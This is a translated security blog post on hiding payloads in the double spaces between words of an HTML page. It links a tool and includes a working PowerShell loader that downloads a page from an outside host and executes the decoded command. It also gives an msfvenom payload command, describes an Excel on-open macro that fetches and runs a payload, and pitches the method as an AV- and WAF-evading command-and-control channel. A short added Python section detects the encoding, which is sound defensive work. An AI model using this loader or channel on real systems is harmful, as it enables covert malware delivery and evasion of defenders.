HTML Whitespace Steganography & Binary Exploit Delivery w/PowerShell over HTML [PoC]
Practical Steganography
A few years ago I came across a very academic challenge: it was a ZIP file containing a particular HTML page, and the aim was to obtain the usual FLAG.
The web page didn’t have any “juicy clue”, script, image or anything else. The only strange thing was the size (a few MB) and the source was all in one line.
What made me suspicious was the content: it was an extract from a Wikipedia page, repeated many times over. So I tried looking for differences between one repetition and another, but I couldn’t find anything at all from the browser, and therefore I checked the source directly. There I discovered that the repetitions were not identical: the occurrences differed up to a certain point, after which the code began to repeat itself exactly.
Comparing the HTML source of the repetitions, the only difference that emerged was double spaces between words, arranged in an apparently random way.
I no longer know how I got there, but searching the Internet I found some papers by Indian undergraduates (I think they were Indian) that laid out the theory of “inter-word” white-space steganography (something like SNOW plus an interesting vector): applying their thesis in my own custom scripts, I managed to recover binary files hidden within those duplicated white spaces on the page.
The files were images, which contained other images, compressed files, their passwords and finally the FLAG hidden in a digital audio file. And that was the challenge and the end of it.
The Concept
As you can see, I mentioned SNOW (SNOW exploits the Steganographic Nature Of Whitespace).
What SNOW does is append white space (spaces and tabs) at the end of each line of an ASCII file, thus encoding binary data, and optionally encrypt it in various ways. The advantage and the limitation of this solution is that the amount of data I can insert into a document is almost unlimited, but only in relation to the number of lines available. The real disadvantage is that any text editor can highlight the excess suspicious spaces and tabs at the end of a line, and the information is lost if the file is processed by a parser that normalizes whitespace.
Steganography of inter-word white space, when applied to web pages, lets us insert any kind of binary data between one word and another, in a way that is absolutely invisible from a browser and hardly recognizable by reading the source: if you don’t know it’s there you will hardly notice it, because an extra space between one tag or word and the next does not make anyone think anything is wrong.
The other positive side is that there is no data loss: both static and dynamic HTML pages are transmitted to the client as-is, and the browser is entirely in charge of interpreting them.
Of course there are some limitations: the capacity is bounded by the length of the “container” page, but the data can be compressed, and you don’t necessarily need a lot of capacity if your payload is a command or a small binary rather than bulk information.
How does it work
Long story short: alternating single and double spaces using a sort of Manchester encoding.
[Figure: Manchester binary data transmission]
So:
- one space == 0
- two spaces == 1
This is possible because a browser collapses runs of white space, so a double space is always rendered as a single one, and spaces between tags are invisible to the reader.
The file “pippo.html”:
<b>Pippo</b> (<i>Goofy</i>, in precedenza <i>Dippy Dawg</i> e <i>Dippy the Goof</i><sup id="cite_ref-:0_1-0" class="reference"><a href="#cite_note-:0-1">[1]</a></sup>) è un <a href="/wiki/Personaggio_immaginario" title="Personaggio immaginario">personaggio immaginario</a> dei <a href="/wiki/Cartone_animato" title="Cartone animato">cartoni animati</a> e dei <a href="/wiki/Fumetti" class="mw-redirect" title="Fumetti">fumetti</a> della <a href="/wiki/Disney" class="mw-redirect" title="Disney">Disney</a>, ideato nel 1932 da <a href="/wiki/Pinto_Colvig" title="Pinto Colvig">Pinto Colvig</a> e dall’animatore Johnny Cannon come comprimario di <a href="/wiki/Topolino" title="Topolino">Topolino</a> in un <a href="/wiki/Cortometraggio" title="Cortometraggio">cortometraggio</a>, ma viene caratterizzato definitivamente dall’animatore <a href="/wiki/Art_Babbitt" title="Art Babbitt">Art Babbitt</a> nel 1935<sup id="cite_ref-:0_1-1" class="reference"><a href="#cite_note-:0-1">[1]</a></sup> e successivamente esordisce nei fumetti realizzati da <a href="/wiki/Floyd_Gottfredson" title="Floyd Gottfredson">Floyd Gottfredson</a> che definisce ulteriormente il personaggio dandogli spessore come spalla di Topolino<sup id="cite_ref-:0_1-2" class="reference"><a href="#cite_note-:0-1">[1]</a></sup>. è apparso in centinaia di cartoni animati come protagonista o comprimario<sup id="cite_ref-:2_2-0" class="reference"><a href="#cite_note-:2-2">[2]</a></sup> e in migliaia di albi a fumetti realizzati in vari paesi del mondo<sup id="cite_ref-3" class="reference"><a href="#cite_note-3">[3]</a></sup>.
…is exactly the same (has the same output) as “pipponinja.html”:
<b>Pippo</b> (<i>Goofy</i>, in precedenza <i>Dippy Dawg</i> e <i>Dippy the Goof</i><sup id="cite_ref-:0_1-0" class="reference"><a href="#cite_note-:0-1">[1]</a></sup>) è un <a href="/wiki/Personaggio_immaginario" title="Personaggio immaginario">personaggio immaginario</a> dei <a href="/wiki/Cartone_animato" title="Cartone animato">cartoni animati</a> e dei <a href="/wiki/Fumetti" class="mw-redirect" title="Fumetti">fumetti</a> della <a href="/wiki/Disney" class="mw-redirect" title="Disney">Disney</a>, ideato nel 1932 da <a href="/wiki/Pinto_Colvig" title="Pinto Colvig">Pinto Colvig</a> e dall’animatore Johnny Cannon come comprimario di <a href="/wiki/Topolino" title="Topolino">Topolino</a> in un <a href="/wiki/Cortometraggio" title="Cortometraggio">cortometraggio</a>, ma viene caratterizzato definitivamente dall’animatore <a href="/wiki/Art_Babbitt" title="Art Babbitt">Art Babbitt</a> nel 1935<sup id="cite_ref-:0_1-1" class="reference"><a href="#cite_note-:0-1">[1]</a></sup> e successivamente esordisce nei fumetti realizzati da <a href="/wiki/Floyd_Gottfredson" title="Floyd Gottfredson">Floyd Gottfredson</a> che definisce ulteriormente il personaggio dandogli spessore come spalla di Topolino<sup id="cite_ref-:0_1-2" class="reference"><a href="#cite_note-:0-1">[1]</a></sup>. è apparso in centinaia di cartoni animati come protagonista o comprimario<sup id="cite_ref-:2_2-0" class="reference"><a href="#cite_note-:2-2">[2]</a></sup> e in migliaia di albi a fumetti realizzati in vari paesi del mondo<sup id="cite_ref-3" class="reference"><a href="#cite_note-3">[3]</a></sup>.
[Figure: pippo.html / pipponinja.html rendered side by side]
In practice
After banging my head against that cursed file trying to decode it, I thought of writing a POC to do the reverse operation and try to “weaponize” a possible payload.
Why do I say “weaponize”? Because I challenge any proxy / WAF / AV to analyze and identify every single space carrying a potentially compressed or password-protected payload, within each page sent in clear on a legitimate HTTP(S) port.
[actually it’s just extremely fun to put an MSF payload into an HTML file and make it “executable”]
This is how HTML-Ninja was born, for lack of a better name.
The tool, raw and incomplete, is a POC written mainly in Python (with JavaScript and VBA variants) that allows you to insert, extract and execute payloads within HTML files. Other features have been added in the meantime, but it is still a spare-time project which has not had much feedback.
Help excerpt:
html-ninja.py -e source content outfile -> will encode the payload file 'content' into file 'source' and output the result as 'outfile'
html-ninja.py -d source outfile -> will try to decrypt white spaces in 'source' file into 'outfile'
html-ninja.py --check filename -> will check 'filename' for available spaces and spaces needed to embed the file
html-ninja.py -d http://localhost/html-ninja.html stdout -> will get http url and output to stdout
html-ninja.py -d http://localhost/html-ninja.html exec -> will get http url and execute the hex payload (payload must have a '|' terminator)
html-ninja.py -ez / -dz ... -> adds zlib compression to both encryption and decryption
html-ninja.py -eb / -db ... -> adds bz2 compression to both encryption and decryption
Examples on github include:
html-ninja.js & html-ninja.html
JavaScript version and sample HTML showing a “self-decrypting” page.
macro_poc.bas & htm
VBA version for automatic execution of payloads via Excel.
buf.txt
Example of an MSF payload:
msfvenom -p linux/x64/exec CMD="whoami;id;uname -a" -f python -o buf.txt
…and a few others…
Demonstration
Let’s take our buf.txt payload and hide it in pippo.html with zlib compression:
Now let’s “read” the content of pipporun.html:
Binary Exploit Delivery w/PowerShell over HTML [PoC]
Static HTML file gets downloaded -> HTML hides binary data -> HTML gets “executed”
Harmless static HTML page with embedded binary payload: https://ephreet.github.io/html-ninja/
We could embed an msfvenom meterpreter or any other file, but for the sake of the PoC we go with the usual “calc.exe”.
Proof of Concept run (payload = “iex calc.exe”):
$CnC = "https://ephreet.github.io/html-ninja/"; $pch = "nil"; $b = ""; $ch = ""
# walk the fetched page one character at a time: a space followed by another space is a 1,
# a space followed by anything else is a 0; the second space of a pair is consumed
foreach ($cu in (Invoke-WebRequest $CnC -UserAgent "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0").ToString().tocharArray()) {
    $ch = $cu
    if ($pch -eq " ") {
        if ($ch -eq " ") { $b = $b + "1"; $ch = "nil" }
        else { $b = $b + "0"; $ch = "nil" }
    }
    $pch = $ch
}
# pack the bit string into 8-bit groups, turn each into a character, then run "<cmd> <arg>"
$c = ""
($b -split '(\w{8})' | ? {$_}) | ForEach-Object { $c = $c + [convert]::Tochar([System.Convert]::ToByte($_,2)) }
$p = $c.Split(" "); & $p[0] $p[1]
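To look at the same channel from the analyst’s side, here is an added Python example (not code from the html-ninja project): it reproduces the decoding walk of the PowerShell snippet above for the single/double-space scheme described in “How does it work”, and adds a gap-statistics check that flags a page where an unusual share of inter-word gaps are double spaces. The carrier sentence, the “secret|” payload, the 32-gap minimum and the 0.2 threshold are constructed for the example.

```python
import re
from dataclasses import dataclass

# Added example, not html-ninja's own code. Inter-word gaps only: runs of
# spaces after a newline (indentation) are deliberately not counted.
GAP = re.compile(r"(?<=\S) {1,2}(?=\S)")

def extract_bits(html: str) -> str:
    """Same walk as the PowerShell decoder: a space followed by another space
    yields 1, a space followed by anything else yields 0; the second space of a
    pair is consumed, so a third space starts a new gap."""
    bits, prev = [], None
    for ch in html:
        if prev == " ":
            bits.append("1" if ch == " " else "0")
            ch = None
        prev = ch
    return "".join(bits)

def decode_payload(html: str, terminator: str = "|") -> str:
    """Pack bits into bytes and cut at the '|' terminator html-ninja's exec mode
    expects; whatever follows is just the carrier's remaining single spaces."""
    bits = extract_bits(html)
    usable = len(bits) - len(bits) % 8
    text = "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, usable, 8))
    return text.split(terminator, 1)[0]

@dataclass
class GapStats:
    gaps: int      # inter-word gaps of one or two spaces
    doubles: int   # how many of them are double spaces
    def ratio(self) -> float:
        return self.doubles / self.gaps if self.gaps else 0.0

def whitespace_stats(html: str) -> GapStats:
    """Ordinary single-line HTML has almost no double spaces between words; a
    carrier holding a random payload has roughly half of its gaps doubled."""
    runs = GAP.findall(html)
    return GapStats(len(runs), sum(1 for r in runs if len(r) == 2))

def looks_suspicious(html: str, min_gaps: int = 32, threshold: float = 0.2) -> bool:
    s = whitespace_stats(html)  # min_gaps keeps one stray double space in a tiny snippet from firing
    return s.gaps >= min_gaps and s.ratio() >= threshold

def embed(carrier: str, payload: bytes) -> str:
    """Fixture writer used only to build a test page offline: widen the carrier's
    single-space gaps wherever the payload bit is 1; the remaining gaps read as 0."""
    bits = iter("".join(f"{b:08b}" for b in payload))
    return re.sub(r"(?<=\S) (?=\S)", lambda m: "  " if next(bits, "0") == "1" else " ", carrier)
```

Any pipeline that normalizes white space (a minifier, a rewriting proxy) destroys this channel entirely, which is the flip side of the “no data loss” claim above.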
Source: https://github.com/ephreet/html-ninja/
Sandbox [ANY.RUN]
Let’s see what a sandbox sees of the payload fetched by the Excel macro.
Used sandbox: any.run
Payload: cmd.exe
The Excel file contains an on-open macro that requests the payload page via HTTP and executes its content using the algorithm above. I expect the abnormal behavior of the script and the download to be detected, but this is a simulation standing in for an already running service.
The Excel file is opened and the payload is executed, so it works. Obviously the sandbox realizes that something is wrong, because the file has contacted a website and a command has been executed.
Analyzing the HTTP request we can only see harmless HTML source:
In this example the page is also saved locally, although that is not required; it doesn’t raise big alarms, however:
Let’s check on VirusTotal anyway:
These are the suspicious indicators: it is clearly unusual for Excel to make HTTP requests, but there is no alarm from the IPS or IDS:
To be clear, normally there would be some evidence like this, namely the Suricata rules:
Okay, the sandbox notices (of course), and the URL is quite obvious. Even a static analysis of the sample would have let us trace the behavior.
But what if, instead of delivering the payload, I had installed a service? What if it were a browser plugin? In short, if I could avoid the sandbox and the connections went to http://random.foo/info.htm (invented!), could I rely only on the reputation of a domain?
Conclusions
Okay, it’s a POC. Yes, a payload must still be delivered before it can be executed. And yes, a sandbox will still notice what is being done.
But let’s imagine a more targeted version, perhaps with an offset from which to read the steganographed part of an HTML page, and a service running on your PC that makes web requests to absolutely harmless pages that we control.
Wouldn’t that be a Command and Control hidden in plain sight? After the sandbox, would an IPS / IDS be able to intercept it?
Meanwhile, I certainly had a lot of fun opening a reverse shell by “running” an HTML file.
Translated from: https://medium.com/swlh/html-whitespace-steganography-binary-exploit-delivery-w-powershell-over-html-poc-68fc286c581d